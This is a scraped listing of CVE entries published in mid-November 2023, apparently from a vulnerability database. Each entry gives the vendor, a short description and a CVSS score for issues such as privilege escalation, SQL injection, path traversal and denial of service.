Improper privilege management in Zoom Rooms for macOS before version 5.16.0 may allow an authenticated user to conduct an escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-39535 AMI Unspecified vulnerability in AMI Aptio V

AMI AptioV contains a vulnerability in BIOS where an attacker may exploit improper input validation via the local network.

7.8
2023-11-14 CVE-2023-39536 AMI Unspecified vulnerability in AMI Aptio V

AMI AptioV contains a vulnerability in BIOS where an attacker may exploit improper input validation via the local network.

7.8
2023-11-14 CVE-2023-39537 AMI Unspecified vulnerability in AMI Aptio V

AMI AptioV contains a vulnerability in BIOS where an attacker may exploit improper input validation via the local network.

7.8
2023-11-14 CVE-2023-46022 Code Projects SQL Injection vulnerability in Code-Projects Blood Bank 1.0

SQL Injection vulnerability in delete.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary SQL commands via the 'bid' parameter.

7.8
2023-11-14 CVE-2023-46582 Code Projects SQL Injection vulnerability in Code-Projects Inventory Management 1.0

SQL injection vulnerability in Inventory Management v.1.0 allows a local attacker to execute arbitrary SQL commands via the id parameter in the deleteProduct.php component.

7.8
2023-11-14 CVE-2022-27229 Intel Path Traversal vulnerability in Intel Hdmi Firmware

Path traversal in some Intel(R) NUC Kits NUC7i3DN, NUC7i5DN, NUC7i7DN HDMI firmware update tool software before version 1.79.1.1 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2022-33898 Intel Incorrect Permission Assignment for Critical Resource vulnerability in Intel NUC Watchdog Timer Utility

Insecure inherited permissions in some Intel(R) NUC Watchdog Timer installation software before version 2.0.21.0 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2022-38786 Intel Unspecified vulnerability in Intel Battery Life Diagnostic Tool 1.0.7/2.2.0

Improper access control in some Intel Battery Life Diagnostic Tool software before version 2.2.1 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2022-41689 Intel Unspecified vulnerability in Intel In-Band Manageability 2.13.0

Improper access control in some Intel In-Band Manageability software before version 3.0.14 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2022-41700 Intel Incorrect Permission Assignment for Critical Resource vulnerability in Intel NUC PRO Software Suite 2.0.0.3

Insecure inherited permissions in some Intel(R) NUC Pro Software Suite installation software before version 2.0.0.9 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2022-45469 Intel Improper Input Validation vulnerability in Intel Unison Software

Improper input validation for some Intel Unison software may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-20563 AMD Improper Privilege Management vulnerability in AMD products

Insufficient protections in System Management Mode (SMM) code may allow an attacker to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-20565 AMD Improper Privilege Management vulnerability in AMD products

Insufficient protections in System Management Mode (SMM) code may allow an attacker to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-22292 Intel Improper Handling of Exceptional Conditions vulnerability in Intel Unison Software

Uncaught exception for some Intel Unison software may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-23583 Intel, Debian, Netapp

Sequence of processor instructions leads to unexpected behavior for some Intel(R) Processors may allow an authenticated user to potentially enable escalation of privilege and/or information disclosure and/or denial of service via local access.

7.8
2023-11-14 CVE-2023-24592 Intel Path Traversal vulnerability in Intel products

Path traversal in some Intel(R) oneAPI Toolkits and Component software before version 2023.1 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-25075 Intel Unquoted Search Path or Element vulnerability in Intel Server Configuration Utility 16.0.7/16.0.8

Unquoted search path in the installer for some Intel Server Configuration Utility software before version 16.0.9 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-27305 Intel Incorrect Default Permissions vulnerability in Intel ARC a Graphics and Iris XE Graphics

Incorrect default permissions in some Intel(R) Arc(TM) Control software before version 1.73.5335.2 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-27513 Intel Uncontrolled Search Path Element vulnerability in Intel Server Information Retrieval Utility

Uncontrolled search path element in some Intel(R) Server Information Retrieval Utility software before version 16.0.9 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-27519 Intel Improper Input Validation vulnerability in Intel products

Improper input validation in firmware for some Intel(R) Optane(TM) SSD products may allow a privileged user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-28377 Intel Improper Authentication vulnerability in Intel USB Firmware

Improper authentication in some Intel(R) NUC Kit NUC11PH USB firmware installation software before version 1.1 for Windows may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-28378 Intel Unspecified vulnerability in Intel products

Improper authorization in some Intel(R) QAT drivers for Windows - HW Version 2.0 before version 2.0.4 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-28388 Intel Uncontrolled Search Path Element vulnerability in Intel Chipset Device Software 10.1.1.45

Uncontrolled search path element in some Intel(R) Chipset Device Software before version 10.1.19444.8378 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-28397 Intel Unspecified vulnerability in Intel Aptio V Uefi Firmware Integrator Tools 5.27.03.0003/5.27.06.0017

Improper access control in some Intel(R) Aptio* V UEFI Firmware Integrator Tools may allow an authenticated user to potentially enable escalation of privileges via local access.

7.8
2023-11-14 CVE-2023-28401 Intel Out-of-bounds Write vulnerability in Intel ARC a Graphics and Iris XE Graphics

Out-of-bounds write in some Intel(R) Arc(TM) & Iris(R) Xe Graphics - WHQL - Windows drivers before version 31.0.101.4255 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-28737 Intel Improper Initialization vulnerability in Intel Aptio V Uefi Firmware Integrator Tools 5.27.03.0003/5.27.06.0017

Improper initialization in some Intel(R) Aptio* V UEFI Firmware Integrator Tools may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-28740 Intel Uncontrolled Search Path Element vulnerability in Intel products

Uncontrolled search path element in some Intel(R) QAT drivers for Windows - HW Version 2.0 before version 2.0.4 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-28741 Intel Classic Buffer Overflow vulnerability in Intel products

Buffer overflow in some Intel(R) QAT drivers for Windows - HW Version 1.0 before version 1.10 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-29157 Intel Unspecified vulnerability in Intel ONE Boot Flash Update

Improper access control in some Intel(R) OFU software before version 14.1.31 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-29161 Intel Uncontrolled Search Path Element vulnerability in Intel ONE Boot Flash Update

Uncontrolled search path in some Intel(R) OFU software before version 14.1.31 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-29504 Intel Uncontrolled Search Path Element vulnerability in Intel Realsense D400 Series Dynamic Calibration Tool 2.11

Uncontrolled search path element in some Intel(R) RealSense(TM) Dynamic Calibration software before version 2.13.1.0 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-32204 Intel Unspecified vulnerability in Intel ONE Boot Flash Update

Improper access control in some Intel(R) OFU software before version 14.1.31 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-32638 Intel Incorrect Default Permissions vulnerability in Intel ARC RGB Controller 1.03

Incorrect default permissions in some Intel Arc RGB Controller software before version 1.06 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-32661 Intel Improper Authentication vulnerability in Intel Realtek SD Card Reader Driver

Improper authentication in some Intel(R) NUC Kits NUC7PJYH and NUC7CJYH Realtek* SD Card Reader Driver installation software before version 10.0.19041.29098 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-33878 Intel Path Traversal vulnerability in Intel Audio Install Package

Path traversal in some Intel(R) NUC P14E Laptop Element Audio Install Package software before version 156 for Windows may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-34314 Intel Incorrect Permission Assignment for Critical Resource vulnerability in Intel Simics Simulator

Insecure inherited permissions in some Intel(R) Simics Simulator software before version 1.7.2 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-34350 Intel Uncontrolled Search Path Element vulnerability in Intel Extreme Tuning Utility 6.4.1.21/6.5.1.360/6.5.3.25

Uncontrolled search path element in some Intel(R) XTU software before version 7.12.0.15 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-34430 Intel Uncontrolled Search Path Element vulnerability in Intel Battery Life Diagnostic Tool 1.0.7/2.2.0

Uncontrolled search path in some Intel Battery Life Diagnostic Tool software before version 2.2.1 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-34997 Intel Incorrect Permission Assignment for Critical Resource vulnerability in Intel Server Configuration Utility 16.0.7/16.0.8

Insecure inherited permissions in the installer for some Intel Server Configuration Utility software before version 16.0.9 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-38411 Intel Unspecified vulnerability in Intel Smart Campus 6.1

Improper access control in the Intel Smart Campus android application before version 9.4 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-38570 Intel Unspecified vulnerability in Intel Unison Software

Access of memory location after end of buffer for some Intel Unison software may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-39230 Intel Incorrect Permission Assignment for Critical Resource vulnerability in Intel Rapid Storage Technology

Insecure inherited permissions in some Intel Rapid Storage Technology software before version 16.8.5.1014.9 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-36033 Microsoft Unspecified vulnerability in Microsoft products

Windows DWM Core Library Elevation of Privilege Vulnerability

7.8
2023-11-14 CVE-2023-36036 Microsoft Unspecified vulnerability in Microsoft products

Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability

7.8
2023-11-14 CVE-2023-36037 Microsoft Unspecified vulnerability in Microsoft products

Microsoft Excel Security Feature Bypass Vulnerability

7.8
2023-11-14 CVE-2023-36041 Microsoft Use After Free vulnerability in Microsoft products

Microsoft Excel Remote Code Execution Vulnerability

7.8
2023-11-14 CVE-2023-36045 Microsoft Unspecified vulnerability in Microsoft products

Microsoft Office Graphics Remote Code Execution Vulnerability

7.8
2023-11-14 CVE-2023-36047 Microsoft Unspecified vulnerability in Microsoft products

Windows Authentication Elevation of Privilege Vulnerability

7.8
2023-11-14 CVE-2023-36393 Microsoft Unspecified vulnerability in Microsoft products

Windows User Interface Application Core Remote Code Execution Vulnerability

7.8
2023-11-14 CVE-2023-36396 Microsoft Unspecified vulnerability in Microsoft Windows 11 22H2

Windows Compressed Folder Remote Code Execution Vulnerability

7.8
2023-11-14 CVE-2023-36407 Microsoft Unspecified vulnerability in Microsoft products

Windows Hyper-V Elevation of Privilege Vulnerability

7.8
2023-11-14 CVE-2023-36408 Microsoft Unspecified vulnerability in Microsoft products

Windows Hyper-V Elevation of Privilege Vulnerability

7.8
2023-11-14 CVE-2023-36422 Microsoft Unspecified vulnerability in Microsoft Windows Defender 1.1.23060.3001

Microsoft Windows Defender Elevation of Privilege Vulnerability

7.8
2023-11-14 CVE-2023-36424 Microsoft Unspecified vulnerability in Microsoft products

Windows Common Log File System Driver Elevation of Privilege Vulnerability

7.8
2023-11-14 CVE-2023-36705 Microsoft Unspecified vulnerability in Microsoft products

Windows Installer Elevation of Privilege Vulnerability

7.8
2023-11-14 CVE-2023-36719 Microsoft Unspecified vulnerability in Microsoft products

Microsoft Speech Application Programming Interface (SAPI) Elevation of Privilege Vulnerability

7.8
2023-11-14 CVE-2023-41840 Fortinet Untrusted Search Path vulnerability in Fortinet Forticlient 7.0.9/7.2.0/7.2.1

An untrusted search path vulnerability in Fortinet FortiClientWindows 7.0.9 allows an attacker to perform a DLL Hijack attack via a malicious OpenSSL engine library in the search path.

7.8
2023-11-14 CVE-2023-6111 Linux Use After Free vulnerability in Linux Kernel

A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation. The function nft_trans_gc_catchall did not remove the catchall set element from the catchall_list when the argument sync is true, making it possible to free a catchall set element many times. We recommend upgrading past commit 93995bf4af2c5a99e2a87f0cd5ce547d31eb7630.

7.8
2023-11-18 CVE-2023-38361 IBM Use of a Broken or Risky Cryptographic Algorithm vulnerability in IBM Cics TX 10.1

IBM CICS TX Advanced 10.1 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information.

7.5
2023-11-18 CVE-2023-46402 GIT Urls Project Unspecified vulnerability in Git-Urls Project Git-Urls 1.0.1

git-urls 1.0.0 allows ReDOS (Regular Expression Denial of Service) in urls.go.

7.5
2023-11-17 CVE-2023-46745 Librenms Improper Restriction of Excessive Authentication Attempts vulnerability in Librenms

LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring which includes support for a wide range of network hardware and operating systems.

7.5
2023-11-17 CVE-2023-48238 Joaquimserafim Insufficient Verification of Data Authenticity vulnerability in Joaquimserafim Json web Token

joaquimserafim/json-web-token is a javascript library use to interact with JSON Web Tokens (JWT) which are a compact URL-safe means of representing claims to be transferred between two parties.

7.5
2023-11-17 CVE-2023-48185 Terra Mater Path Traversal vulnerability in Terra-Mater Terra-Master

Directory Traversal vulnerability in TerraMaster v.s1.0 through v.2.295 allows a remote attacker to obtain sensitive information via a crafted GET request.

7.5
2023-11-17 CVE-2023-26347 Adobe Improper Access Control vulnerability in Adobe Coldfusion

Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass.

7.5
2023-11-17 CVE-2023-22272 Adobe Improper Input Validation vulnerability in Adobe Robohelp Server

Adobe RoboHelp Server versions 11.4 and earlier are affected by an Improper Input Validation vulnerability that could lead to information disclosure by an unauthenticated attacker.

7.5
2023-11-17 CVE-2023-22274 Adobe XXE vulnerability in Adobe Robohelp Server

Adobe RoboHelp Server versions 11.4 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could lead to information disclosure by an unauthenticated attacker.

7.5
2023-11-17 CVE-2023-22275 Adobe SQL Injection vulnerability in Adobe Robohelp Server

Adobe RoboHelp Server versions 11.4 and earlier are affected by an Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability that could lead to information disclosure by an unauthenticated attacker.

7.5
2023-11-17 CVE-2023-38313 Opennds NULL Pointer Dereference vulnerability in Opennds Captive Portal

An issue was discovered in OpenNDS Captive Portal before 10.1.2.

7.5
2023-11-17 CVE-2023-38315 Opennds NULL Pointer Dereference vulnerability in Opennds Captive Portal

An issue was discovered in OpenNDS Captive Portal before version 10.1.2.

7.5
2023-11-17 CVE-2023-38320 Opennds NULL Pointer Dereference vulnerability in Opennds Captive Portal

An issue was discovered in OpenNDS Captive Portal before version 10.1.2.

7.5
2023-11-17 CVE-2023-38322 Opennds NULL Pointer Dereference vulnerability in Opennds Captive Portal

An issue was discovered in OpenNDS Captive Portal before version 10.1.2.

7.5
2023-11-17 CVE-2023-41102 Opennds Memory Leak vulnerability in Opennds

An issue was discovered in the captive portal in OpenNDS before version 10.1.3.

7.5
2023-11-17 CVE-2023-45382 Common Services Path Traversal vulnerability in Common-Services Sonice Retour

In the module "SoNice Retour" (sonice_retour) up to version 2.1.0 from Common-Services for PrestaShop, a guest can download personal information without restriction by performing a path traversal attack.

7.5
2023-11-16 CVE-2023-6020 RAY Project Missing Authorization vulnerability in RAY Project RAY

LFI in Ray's /static/ directory allows attackers to read any file on the server without authentication.

7.5
2023-11-16 CVE-2023-48134 Linecorp Unspecified vulnerability in Linecorp Line 13.6.1

nagayama_copabowl Line 13.6.1 is vulnerable to Exposure of Sensitive Information to an Unauthorized Actor.

7.5
2023-11-16 CVE-2023-48053 Archerydms Use of Hard-coded Credentials vulnerability in Archerydms Archery 1.9.0

Archery v1.10.0 uses a non-random or static IV for Cipher Block Chaining (CBC) mode in AES encryption.

7.5
2023-11-16 CVE-2023-48055 Superagi Use of Hard-coded Credentials vulnerability in Superagi 0.0.13

SuperAGI v0.0.13 was discovered to use a hardcoded key for encryption operations.

7.5
2023-11-16 CVE-2023-48056 Bandoche Use of Insufficiently Random Values vulnerability in Bandoche Pypinksign 0.5.1

PyPinkSign v0.5.1 uses a non-random or static IV for Cipher Block Chaining (CBC) mode in AES encryption.

7.5
2023-11-16 CVE-2023-6021 RAY Project Path Traversal vulnerability in RAY Project RAY

LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication.

7.5
2023-11-16 CVE-2023-6038 H2O Missing Authorization vulnerability in H2O

A Local File Inclusion (LFI) vulnerability exists in the h2o-3 REST API, allowing unauthenticated remote attackers to read arbitrary files on the server with the permissions of the user running the h2o-3 instance.

7.5
2023-11-16 CVE-2023-6015 Lfprojects Path Traversal vulnerability in Lfprojects Mlflow

MLflow allowed arbitrary files to be PUT onto the server.

7.5
2023-11-16 CVE-2023-6023 Vertaai Path Traversal vulnerability in Vertaai Modeldb

An attacker can read any file on the filesystem on the server hosting ModelDB through an LFI in the artifact_path URL parameter.

7.5
2023-11-16 CVE-2023-26031 Apache Untrusted Search Path vulnerability in Apache Hadoop 3.3.1/3.3.2/3.3.4

Relative library resolution in linux container-executor binary in Apache Hadoop 3.3.1-3.3.4 on Linux allows local user to gain root privileges.

7.5
2023-11-16 CVE-2023-47263 Withsecure Unspecified vulnerability in Withsecure products

Certain WithSecure products allow a Denial of Service (DoS) in the antivirus engine when scanning a fuzzed PE32 file.

7.5
2023-11-16 CVE-2023-47264 Withsecure Out-of-bounds Read vulnerability in Withsecure products

Certain WithSecure products have a buffer over-read whereby processing certain fuzz file types may cause a denial of service (DoS).

7.5
2023-11-15 CVE-2023-47345 Free5Gc Classic Buffer Overflow vulnerability in Free5Gc 3.3.0

Buffer Overflow vulnerability in free5gc 3.3.0 allows attackers to cause a denial of service via crafted PFCP message with malformed PFCP Heartbeat message whose Recovery Time Stamp IE length is mutated to zero.

7.5
2023-11-15 CVE-2023-47347 Free5Gc Classic Buffer Overflow vulnerability in Free5Gc 3.3.0

Buffer Overflow vulnerability in free5gc 3.3.0 allows attackers to cause a denial of service via crafted PFCP messages whose Sequence Number is mutated to overflow bytes.

7.5
2023-11-15 CVE-2023-5720 Quarkus Unspecified vulnerability in Quarkus

A flaw was found in Quarkus, where it does not properly sanitize artifacts created using the Gradle plugin, allowing certain build system information to remain.

7.5
2023-11-15 CVE-2023-34062 Pivotal Path Traversal vulnerability in Pivotal Reactor Netty 1.0.11/1.0.23

In Reactor Netty HTTP Server, versions 1.1.x prior to 1.1.13 and versions 1.0.x prior to 1.0.39, a malicious user can send a request using a specially crafted URL that can lead to a directory traversal attack. Specifically, an application is vulnerable if Reactor Netty HTTP Server is configured to serve static resources.

7.5
2023-11-14 CVE-2023-39203 Zoom Unspecified vulnerability in Zoom Virtual Desktop Infrastructure and Zoom

Uncontrolled resource consumption in Zoom Team Chat for Zoom Desktop Client for Windows and Zoom VDI Client may allow an unauthenticated user to conduct a disclosure of information via network access.

7.5
2023-11-14 CVE-2023-39204 Zoom Classic Buffer Overflow vulnerability in Zoom products

Buffer overflow in some Zoom clients may allow an unauthenticated user to conduct a denial of service via network access.

7.5
2023-11-14 CVE-2023-39206 Zoom Classic Buffer Overflow vulnerability in Zoom products

Buffer overflow in some Zoom clients may allow an unauthenticated user to conduct a denial of service via network access.

7.5
2023-11-14 CVE-2023-45620 Arubanetworks, HP

Unauthenticated Denial-of-Service (DoS) vulnerabilities exist in the CLI service accessed via the PAPI protocol.

7.5
2023-11-14 CVE-2023-45621 Arubanetworks, HP

Unauthenticated Denial-of-Service (DoS) vulnerabilities exist in the CLI service accessed via the PAPI protocol.

7.5
2023-11-14 CVE-2023-45622 Arubanetworks, HP

Unauthenticated Denial-of-Service (DoS) vulnerabilities exist in the BLE daemon service accessed via the PAPI protocol.

7.5
2023-11-14 CVE-2023-45623 Arubanetworks, HP

Unauthenticated Denial-of-Service (DoS) vulnerabilities exist in the Wi-Fi Uplink service accessed via the PAPI protocol.

7.5
2023-11-14 CVE-2023-45624 Arubanetworks, HP

An unauthenticated Denial-of-Service (DoS) vulnerability exists in the soft ap daemon accessed via the PAPI protocol.

7.5
2023-11-14 CVE-2023-36038 Microsoft Unspecified vulnerability in Microsoft Asp.Net Core and Visual Studio 2022

ASP.NET Core Denial of Service Vulnerability

7.5
2023-11-14 CVE-2023-46024 Phpgurukul SQL Injection vulnerability in PHPgurukul Teacher Subject Allocation Management System 1.0

SQL Injection vulnerability in index.php in phpgurukul Teacher Subject Allocation Management System 1.0 allows attackers to run arbitrary SQL commands and obtain sensitive information via the 'searchdata' parameter.

7.5
2023-11-14 CVE-2023-47627 Aiohttp HTTP Request Smuggling vulnerability in Aiohttp

aiohttp is an asynchronous HTTP client/server framework for asyncio and Python.

7.5
2023-11-14 CVE-2021-46774 AMD Unspecified vulnerability in AMD products

Insufficient DRAM address validation in System Management Unit (SMU) may allow an attacker to read/write from/to an invalid DRAM address, potentially resulting in denial-of-service.

7.5
2023-11-14 CVE-2023-20533 AMD Unspecified vulnerability in AMD products

Insufficient DRAM address validation in System Management Unit (SMU) may allow an attacker to read/write from/to an invalid DRAM address, potentially resulting in denial-of-service.

7.5
2023-11-14 CVE-2023-20566 AMD Unspecified vulnerability in AMD products

Improper address validation in ASP with SNP enabled may potentially allow an attacker to compromise guest memory integrity.

7.5
2023-11-14 CVE-2023-22285 Intel Unspecified vulnerability in Intel Unison Software

Improper access control for some Intel Unison software may allow an unauthenticated user to potentially enable denial of service via network access.

7.5
2023-11-14 CVE-2023-22337 Intel Improper Input Validation vulnerability in Intel Unison Software

Improper input validation for some Intel Unison software may allow an unauthenticated user to potentially enable denial of service via network access.

7.5
2023-11-14 CVE-2023-31203 Intel Unspecified vulnerability in Intel Openvino Model Server

Improper input validation in some OpenVINO Model Server software before version 2022.3 for Intel Distribution of OpenVINO toolkit may allow an unauthenticated user to potentially enable denial of service via network access.

7.5
2023-11-14 CVE-2023-31320 AMD Improper Input Validation vulnerability in AMD products

Improper input validation in the AMD Radeon(TM) Graphics display driver may allow an attacker to corrupt the display potentially resulting in denial of service.

7.5
2023-11-14 CVE-2023-32279 Intel Unspecified vulnerability in Intel Connectivity Performance Suite

Improper access control in user mode driver for some Intel(R) Connectivity Performance Suite before version 2.1123.214.2 may allow an unauthenticated user to potentially enable information disclosure via network access.

7.5
2023-11-14 CVE-2023-39228 Intel Unspecified vulnerability in Intel Unison Software

Improper access control for some Intel Unison software may allow an unauthenticated user to potentially enable denial of service via network access.

7.5
2023-11-14 CVE-2023-36392 Microsoft Unspecified vulnerability in Microsoft products

DHCP Server Service Denial of Service Vulnerability

7.5
2023-11-14 CVE-2023-36395 Microsoft Unspecified vulnerability in Microsoft products

Windows Deployment Services Denial of Service Vulnerability

7.5
2023-11-14 CVE-2023-42783 Fortinet Relative Path Traversal vulnerability in Fortinet Fortiwlm

A relative path traversal in Fortinet FortiWLM version 8.6.0 through 8.6.5 and 8.5.0 through 8.5.4 and 8.4.2 through 8.4.0 and 8.3.2 through 8.3.0 and 8.2.2 allows an attacker to read arbitrary files via crafted HTTP requests.

7.5
2023-11-14 CVE-2023-45684 Northern Tech SQL Injection vulnerability in Northern.Tech Cfengine

Northern.tech CFEngine Enterprise before 3.21.3 allows SQL Injection.

7.5
2023-11-14 CVE-2023-43503 Siemens Cleartext Transmission of Sensitive Information vulnerability in Siemens Comos

A vulnerability has been identified in COMOS (All versions < V10.4.4).

7.5
2023-11-14 CVE-2023-46590 Siemens XXE vulnerability in Siemens OPC UA Modeling Editor

A vulnerability has been identified in Siemens OPC UA Modelling Editor (SiOME) (All versions < V2.8).

7.5
2023-11-14 CVE-2023-46601 Siemens Improper Access Control vulnerability in Siemens Comos

A vulnerability has been identified in COMOS (All versions).

7.5
2023-11-14 CVE-2023-45558 Golden Project Unspecified vulnerability in Golden Project Golden 13.6.1

An issue in Golden v.13.6.1 allows attackers to send crafted notifications via leakage of the channel access token.

7.5
2023-11-14 CVE-2023-45560 Memberscard Project Unspecified vulnerability in Memberscard Project Memberscard 13.6.1

An issue in Yasukawa memberscard v.13.6.1 allows attackers to send crafted notifications via leakage of the channel access token.

7.5
2023-11-13 CVE-2023-47346 Free5Gc Classic Buffer Overflow vulnerability in Free5Gc Free5Gc, SMF and UPF

Buffer Overflow vulnerability in free5gc 3.3.0, UPF 1.2.0, and SMF 1.2.0 allows attackers to cause a denial of service via crafted PFCP messages.

7.5
2023-11-13 CVE-2023-47117 Humansignal Unspecified vulnerability in Humansignal Label Studio

Label Studio is an open source data labeling tool.

7.5
2023-11-13 CVE-2023-6101 Maiwei Safety Production Control Platform Project Unspecified vulnerability in Maiwei Safety Production Control Platform Project Maiwei Safety Production Control Platform 4.1

A vulnerability, which was classified as problematic, has been found in Maiwei Safety Production Control Platform 4.1.

7.5
2023-11-13 CVE-2022-45835 Phonepe Server-Side Request Forgery (SSRF) vulnerability in Phonepe

Server-Side Request Forgery (SSRF) vulnerability in PhonePe PhonePe Payment Solutions. This issue affects PhonePe Payment Solutions: from n/a through 1.0.15.

7.5
2023-11-13 CVE-2023-34013 AYS PRO Server-Side Request Forgery (SSRF) vulnerability in Ays-Pro Poll Maker

Server-Side Request Forgery (SSRF) vulnerability in Poll Maker Team Poll Maker – Best WordPress Poll Plugin. This issue affects Poll Maker – Best WordPress Poll Plugin: from n/a through 4.6.2.

7.5
2023-11-13 CVE-2023-46207 Stylemixthemes Server-Side Request Forgery (SSRF) vulnerability in Stylemixthemes Motors - CAR Dealer, Classifieds & Listing

Server-Side Request Forgery (SSRF) vulnerability in StylemixThemes Motors – Car Dealer, Classifieds & Listing. This issue affects Motors – Car Dealer, Classifieds & Listing: from n/a through 1.4.6.

7.5
2023-11-13 CVE-2023-47163 Remarshal Project Uncontrolled Recursion vulnerability in Remarshal Project Remarshal

Remarshal prior to v0.17.1 expands YAML alias nodes unlimitedly, hence Remarshal is vulnerable to Billion Laughs Attack.

7.5
2023-11-16 CVE-2023-48052 Httpie Improper Certificate Validation vulnerability in Httpie 3.2.2

Missing SSL certificate validation in HTTPie v3.2.2 allows attackers to eavesdrop on communications between the host and server via a man-in-the-middle attack.

7.4
2023-11-16 CVE-2023-48054 Localstack Improper Certificate Validation vulnerability in Localstack 2.3.2

Missing SSL certificate validation in localstack v2.3.2 allows attackers to eavesdrop on communications between the host and server via a man-in-the-middle attack.

7.4
2023-11-16 CVE-2023-39246 Dell Link Following vulnerability in Dell products

Dell Encryption, Dell Endpoint Security Suite Enterprise, and Dell Security Management Server version prior to 11.8.1 contain an Insecure Operation on Windows Junction Vulnerability during installation.

7.3
2023-11-14 CVE-2023-29165 Intel Unquoted Search Path or Element vulnerability in Intel ARC a Graphics and Iris XE Graphics

Unquoted search path or element in some Intel(R) Arc(TM) Control software before version 1.73.5335.2 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.3
2023-11-14 CVE-2023-32278 Intel Path Traversal vulnerability in Intel NUC Uniwill Service Driver

Path traversal in some Intel(R) NUC Uniwill Service Driver for Intel(R) NUC M15 Laptop Kits - LAPRC510 & LAPRC710 Uniwill Service Driver installation software before version 1.0.1.7 for Intel(R) NUC Software Studio may allow an authenticated user to potentially enable escalation of privilege via local access.

7.3
2023-11-14 CVE-2023-32655 Intel Path Traversal vulnerability in Intel USB Type C Power Delivery Controller

Path traversal in some Intel(R) NUC Kits & Mini PCs - NUC8i7HVK & NUC8HNK USB Type C power delivery controller installation software before version 1.0.10.3 for Windows may allow an authenticated user to potentially enable escalation of privilege via local access.

7.3
2023-11-14 CVE-2023-32658 Intel Unquoted Search Path or Element vulnerability in Intel Hdmi Firmware

Unquoted search path in some Intel(R) NUC Kits NUC7i3DN, NUC7i5DN, NUC7i7DN HDMI firmware update tool software before version 1.79.1.1 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.3
2023-11-14 CVE-2023-32660 Intel Uncontrolled Search Path Element vulnerability in Intel Thunderbolt 3 Controller Firmware 27/38

Uncontrolled search path in some Intel(R) NUC Kit NUC6i7KYK Thunderbolt(TM) 3 Firmware Update Tool installation software before version 46 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.3
2023-11-14 CVE-2023-33874 Intel Uncontrolled Search Path Element vulnerability in Intel HID Event Filter Driver

Uncontrolled search path in some Intel(R) NUC 12 Pro Kits & Mini PCs - NUC12WS Intel(R) HID Event Filter Driver installation software before version 2.2.2.1 for Windows may allow an authenticated user to potentially enable escalation of privilege via local access.

7.3
2023-11-14 CVE-2023-45582 Fortinet Improper Restriction of Excessive Authentication Attempts vulnerability in Fortinet Fortimail

An improper restriction of excessive authentication attempts vulnerability [CWE-307] in FortiMail webmail version 7.2.0 through 7.2.4, 7.0.0 through 7.0.6 and before 6.4.8 may allow an unauthenticated attacker to perform a brute force attack on the affected endpoints via repeated login attempts.

7.3
2023-11-17 CVE-2023-22273 Adobe Path Traversal vulnerability in Adobe Robohelp Server

Adobe RoboHelp Server versions 11.4 and earlier are affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could lead to Remote Code Execution by an admin authenticated attacker.

7.2
2023-11-17 CVE-2023-47675 Cubecart OS Command Injection vulnerability in Cubecart

CubeCart prior to 6.5.3 allows a remote authenticated attacker with an administrative privilege to execute an arbitrary OS command.

7.2
